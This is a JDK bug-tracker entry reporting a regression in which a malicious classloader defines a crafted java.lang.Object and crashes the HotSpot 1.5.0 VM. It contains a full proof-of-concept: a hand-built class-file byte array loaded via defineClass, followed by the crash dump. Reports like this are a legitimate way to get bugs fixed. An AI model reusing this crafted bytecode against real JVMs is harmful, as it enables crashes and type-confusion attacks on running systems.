Uploaded image for project: 'JDK'
  1. JDK
  2. JDK-6194361

REGRESSION: Errant classloader crashes jvm when trying to redefine java.lang.Object

    XMLWordPrintable

Details

    • b65
    • x86
    • windows_2000

    Description

      FULL PRODUCT VERSION :
      java version "1.5.0"
      Java(TM) 2 Runtime Environment, Standard Edition (build 1.5.0-b64)
      Java HotSpot(TM) Client VM (build 1.5.0-b64, mixed mode, sharing)

      OS: Windows 2000, WindowsXP


      A DESCRIPTION OF THE PROBLEM :
      There is a known demonstration of a malicious classloader that tries to
      redefine java.lang.Object. This program has crashed VM's right up to 1.4.1 but interestingly 1.4.2 rejects the program with a VerifyError.

      But in 1.4.2_06, it does not crash.

      import java.io.*;

      class Crash extends ClassLoader
      {
        /*
      package java.lang;

      public class Object
      {
        int field;
        public boolean equals(Object o) { System.out.println(o.field); return false; }
      }
        */
       
        static byte[] buf = {
      (byte)0xCA, (byte)0xFE, (byte)0xBA, (byte)0xBE, (byte)0x00, (byte)0x00, (byte)0x00, (byte)0x30, (byte)0x00, (byte)0x1B, (byte)0x01,
      (byte)0x00, (byte)0x10, (byte)0x6A, (byte)0x61, (byte)0x76, (byte)0x61, (byte)0x2F, (byte)0x6C, (byte)0x61, (byte)0x6E, (byte)0x67,
      (byte)0x2F, (byte)0x4F, (byte)0x62, (byte)0x6A, (byte)0x65, (byte)0x63, (byte)0x74, (byte)0x07, (byte)0x00, (byte)0x01, (byte)0x01,
      (byte)0x00, (byte)0x05, (byte)0x66, (byte)0x69, (byte)0x65, (byte)0x6C, (byte)0x64, (byte)0x01, (byte)0x00, (byte)0x01, (byte)0x49,
      (byte)0x01, (byte)0x00, (byte)0x06, (byte)0x65, (byte)0x71, (byte)0x75, (byte)0x61, (byte)0x6C, (byte)0x73, (byte)0x01, (byte)0x00,
      (byte)0x15, (byte)0x28, (byte)0x4C, (byte)0x6A, (byte)0x61, (byte)0x76, (byte)0x61, (byte)0x2F, (byte)0x6C, (byte)0x61, (byte)0x6E,
      (byte)0x67, (byte)0x2F, (byte)0x4F, (byte)0x62, (byte)0x6A, (byte)0x65, (byte)0x63, (byte)0x74, (byte)0x3B, (byte)0x29, (byte)0x5A,
      (byte)0x01, (byte)0x00, (byte)0x04, (byte)0x43, (byte)0x6F, (byte)0x64, (byte)0x65, (byte)0x01, (byte)0x00, (byte)0x0F, (byte)0x4C,
      (byte)0x69, (byte)0x6E, (byte)0x65, (byte)0x4E, (byte)0x75, (byte)0x6D, (byte)0x62, (byte)0x65, (byte)0x72, (byte)0x54, (byte)0x61,
      (byte)0x62, (byte)0x6C, (byte)0x65, (byte)0x01, (byte)0x00, (byte)0x03, (byte)0x6F, (byte)0x75, (byte)0x74, (byte)0x01, (byte)0x00,
      (byte)0x15, (byte)0x4C, (byte)0x6A, (byte)0x61, (byte)0x76, (byte)0x61, (byte)0x2F, (byte)0x69, (byte)0x6F, (byte)0x2F, (byte)0x50,
      (byte)0x72, (byte)0x69, (byte)0x6E, (byte)0x74, (byte)0x53, (byte)0x74, (byte)0x72, (byte)0x65, (byte)0x61, (byte)0x6D, (byte)0x3B,
      (byte)0x0C, (byte)0x00, (byte)0x09, (byte)0x00, (byte)0x0A, (byte)0x01, (byte)0x00, (byte)0x10, (byte)0x6A, (byte)0x61, (byte)0x76,
      (byte)0x61, (byte)0x2F, (byte)0x6C, (byte)0x61, (byte)0x6E, (byte)0x67, (byte)0x2F, (byte)0x53, (byte)0x79, (byte)0x73, (byte)0x74,
      (byte)0x65, (byte)0x6D, (byte)0x07, (byte)0x00, (byte)0x0C, (byte)0x09, (byte)0x00, (byte)0x0D, (byte)0x00, (byte)0x0B, (byte)0x0C,
      (byte)0x00, (byte)0x03, (byte)0x00, (byte)0x04, (byte)0x09, (byte)0x00, (byte)0x02, (byte)0x00, (byte)0x0F, (byte)0x01, (byte)0x00,
      (byte)0x07, (byte)0x70, (byte)0x72, (byte)0x69, (byte)0x6E, (byte)0x74, (byte)0x6C, (byte)0x6E, (byte)0x01, (byte)0x00, (byte)0x04,
      (byte)0x28, (byte)0x49, (byte)0x29, (byte)0x56, (byte)0x0C, (byte)0x00, (byte)0x11, (byte)0x00, (byte)0x12, (byte)0x01, (byte)0x00,
      (byte)0x13, (byte)0x6A, (byte)0x61, (byte)0x76, (byte)0x61, (byte)0x2F, (byte)0x69, (byte)0x6F, (byte)0x2F, (byte)0x50, (byte)0x72,
      (byte)0x69, (byte)0x6E, (byte)0x74, (byte)0x53, (byte)0x74, (byte)0x72, (byte)0x65, (byte)0x61, (byte)0x6D, (byte)0x07, (byte)0x00,
      (byte)0x14, (byte)0x0A, (byte)0x00, (byte)0x15, (byte)0x00, (byte)0x13, (byte)0x01, (byte)0x00, (byte)0x06, (byte)0x3C, (byte)0x69,
      (byte)0x6E, (byte)0x69, (byte)0x74, (byte)0x3E, (byte)0x01, (byte)0x00, (byte)0x03, (byte)0x28, (byte)0x29, (byte)0x56, (byte)0x01,
      (byte)0x00, (byte)0x0A, (byte)0x53, (byte)0x6F, (byte)0x75, (byte)0x72, (byte)0x63, (byte)0x65, (byte)0x46, (byte)0x69, (byte)0x6C,
      (byte)0x65, (byte)0x01, (byte)0x00, (byte)0x0B, (byte)0x4F, (byte)0x62, (byte)0x6A, (byte)0x65, (byte)0x63, (byte)0x74, (byte)0x2E,
      (byte)0x6A, (byte)0x61, (byte)0x76, (byte)0x61, (byte)0x00, (byte)0x21, (byte)0x00, (byte)0x02, (byte)0x00, (byte)0x00, (byte)0x00,
      (byte)0x00, (byte)0x00, (byte)0x01, (byte)0x00, (byte)0x00, (byte)0x00, (byte)0x03, (byte)0x00, (byte)0x04, (byte)0x00, (byte)0x00,
      (byte)0x00, (byte)0x02, (byte)0x00, (byte)0x01, (byte)0x00, (byte)0x05, (byte)0x00, (byte)0x06, (byte)0x00, (byte)0x01, (byte)0x00,
      (byte)0x07, (byte)0x00, (byte)0x00, (byte)0x00, (byte)0x28, (byte)0x00, (byte)0x02, (byte)0x00, (byte)0x02, (byte)0x00, (byte)0x00,
      (byte)0x00, (byte)0x0C, (byte)0xB2, (byte)0x00, (byte)0x0E, (byte)0x2B, (byte)0xB4, (byte)0x00, (byte)0x10, (byte)0xB6, (byte)0x00,
      (byte)0x16, (byte)0x03, (byte)0xAC, (byte)0x00, (byte)0x00, (byte)0x00, (byte)0x01, (byte)0x00, (byte)0x08, (byte)0x00, (byte)0x00,
      (byte)0x00, (byte)0x0A, (byte)0x00, (byte)0x02, (byte)0x00, (byte)0x00, (byte)0x00, (byte)0x06, (byte)0x00, (byte)0x0A, (byte)0x00,
      (byte)0x06, (byte)0x00, (byte)0x01, (byte)0x00, (byte)0x17, (byte)0x00, (byte)0x18, (byte)0x00, (byte)0x01, (byte)0x00, (byte)0x07,
      (byte)0x00, (byte)0x00, (byte)0x00, (byte)0x19, (byte)0x00, (byte)0x00, (byte)0x00, (byte)0x01, (byte)0x00, (byte)0x00, (byte)0x00,
      (byte)0x01, (byte)0xB1, (byte)0x00, (byte)0x00, (byte)0x00, (byte)0x01, (byte)0x00, (byte)0x08, (byte)0x00, (byte)0x00, (byte)0x00,
      (byte)0x06, (byte)0x00, (byte)0x01, (byte)0x00, (byte)0x00, (byte)0x00, (byte)0x03, (byte)0x00, (byte)0x01, (byte)0x00, (byte)0x19,
      (byte)0x00, (byte)0x00, (byte)0x00, (byte)0x02, (byte)0x00, (byte)0x1A
        };

        public static void main(String[] args) throws Exception
        {
          Crash loader = new Crash();
          Class c = loader.defineClass(buf, 0, buf.length);
          c.newInstance().equals("foo");
        }
      }


      ERROR MESSAGES/STACK TRACES THAT OCCUR :
      #
      # An unexpected error has been detected by HotSpot Virtual Machine:
      #
      # Internal Error (53484152454432554E54494D450E43505001A1), pid=1636, tid=984
      #
      # Java VM: Java HotSpot(TM) Client VM (1.5.0-b64 mixed mode, sharing)

      --------------- T H R E A D ---------------

      Current thread (0x00235710): JavaThread "main" [_thread_in_Java, id=984]

      Stack: [0x00030000,0x00070000), sp=0x0006f5c0, free space=253k
      Native frames: (J=compiled Java code, j=interpreted, Vv=VM code, C=native code)
      V [jvm.dll+0x11182c]
      V [jvm.dll+0x60e50]
      V [jvm.dll+0xe8844]
      V [jvm.dll+0xd2e5e]
      V [jvm.dll+0xd4186]
      V [jvm.dll+0x8155e]
      V [jvm.dll+0x8844c]
      C [java.exe+0x14c0]
      C [java.exe+0x64cd]
      C [KERNEL32.DLL+0x11af6]


      --------------- P R O C E S S ---------------

      Java Threads: ( => current thread )
        0x0099c4a8 JavaThread "Low Memory Detector" daemon [_thread_blocked, id=1664]
        0x0099afb0 JavaThread "CompilerThread0" daemon [_thread_blocked, id=1660]
        0x0099ab70 JavaThread "Signal Dispatcher" daemon [_thread_blocked, id=1656]
        0x009755e8 JavaThread "Finalizer" daemon [_thread_blocked, id=1652]
        0x00974158 JavaThread "Reference Handler" daemon [_thread_blocked, id=1648]
      =>0x00235710 JavaThread "main" [_thread_in_Java, id=984]

      Other Threads:
        0x0023f838 VMThread [id=1632]
        0x009b73a0 WatcherThread [id=1668]

      VM state:not at safepoint (normal execution)

      VM Mutex/Monitor currently owned by a thread: None

      Heap
       def new generation total 576K, used 159K [0x22aa0000, 0x22b40000, 0x22f80000)
        eden space 512K, 31% used [0x22aa0000, 0x22ac7e60, 0x22b20000)
        from space 64K, 0% used [0x22b20000, 0x22b20000, 0x22b30000)
        to space 64K, 0% used [0x22b30000, 0x22b30000, 0x22b40000)
       tenured generation total 1408K, used 0K [0x22f80000, 0x230e0000, 0x26aa0000)
         the space 1408K, 0% used [0x22f80000, 0x22f80000, 0x22f80200, 0x230e0000)
       compacting perm gen total 8192K, used 18K [0x26aa0000, 0x272a0000, 0x2aaa0000)
         the space 8192K, 0% used [0x26aa0000, 0x26aa48d8, 0x26aa4a00, 0x272a0000)
          ro space 8192K, 66% used [0x2aaa0000, 0x2aff7960, 0x2aff7a00, 0x2b2a0000)
          rw space 12288K, 46% used [0x2b2a0000, 0x2b8343a8, 0x2b834400, 0x2bea0000)

      Dynamic libraries:
      0x00400000 - 0x0040c000 c:\apps\sun-jdk\1.5\bin\java.exe
      0x77f80000 - 0x77ffd000 C:\WINNT\system32\ntdll.dll
      0x7c2d0000 - 0x7c332000 C:\WINNT\system32\ADVAPI32.dll
      0x7c570000 - 0x7c628000 C:\WINNT\system32\KERNEL32.DLL
      0x77d30000 - 0x77da1000 C:\WINNT\system32\RPCRT4.DLL
      0x78000000 - 0x78045000 C:\WINNT\system32\MSVCRT.dll
      0x6d640000 - 0x6d7c5000 c:\apps\sun-jdk\1.5\jre\bin\client\jvm.dll
      0x77e10000 - 0x77e75000 C:\WINNT\system32\USER32.dll
      0x77f40000 - 0x77f7e000 C:\WINNT\system32\GDI32.DLL
      0x77570000 - 0x775a0000 C:\WINNT\system32\WINMM.dll
      0x6d280000 - 0x6d288000 c:\apps\sun-jdk\1.5\jre\bin\hpi.dll
      0x690a0000 - 0x690ab000 C:\WINNT\system32\PSAPI.DLL
      0x6d610000 - 0x6d61c000 c:\apps\sun-jdk\1.5\jre\bin\verify.dll
      0x6d300000 - 0x6d31d000 c:\apps\sun-jdk\1.5\jre\bin\java.dll
      0x6d630000 - 0x6d63f000 c:\apps\sun-jdk\1.5\jre\bin\zip.dll

      VM Arguments:
      java_command: Crash

      Environment Variables:
      PATH=c:\apps\sun-jdk\1.5\bin;C:\WINNT\system32;C:\WINNT;C:\WINNT\System32\Wbem;G:\apps\GNU\WINCVS~1.3\cvsnt;C:\Program Files\Common Files\Adaptec Shared\System;c:\apps\bin;c:\apps\PuTTy;"g:\apps\gnu\wincvs 1.3\cvsnt"
      USERNAME=dholmes
      OS=Windows_NT
      PROCESSOR_IDENTIFIER=x86 Family 6 Model 8 Stepping 10, GenuineIntel


      --------------- S Y S T E M ---------------

      OS: Windows 2000 Build 2195 Service Pack 4

      CPU:total 1 family 6, cmov, cx8, fxsr, mmx, sse

      Memory: 4k page, physical 523676k(307980k free), swap 884668k(671220k free)

      vm_info: Java HotSpot(TM) Client VM (1.5.0-b64) for windows-x86, built on Sep 15 2004 03:00:31 by "java_re" with MS VC++ 6.0

      Release Regression From : 1.4.2_06
      The above release value was the last known release where this
      bug was known to work. Since then there has been a regression.
      ###@###.### 2004-11-11 23:51:16 GMT

      Attachments

        Activity

          People

            kamg Keith Mcguigan (Inactive)
            rmandalasunw Ranjith Mandala (Inactive)
            Votes:
            0 Vote for this issue
            Watchers:
            3 Start watching this issue

            Dates

              Created:
              Updated:
              Resolved:
              Imported:
              Indexed: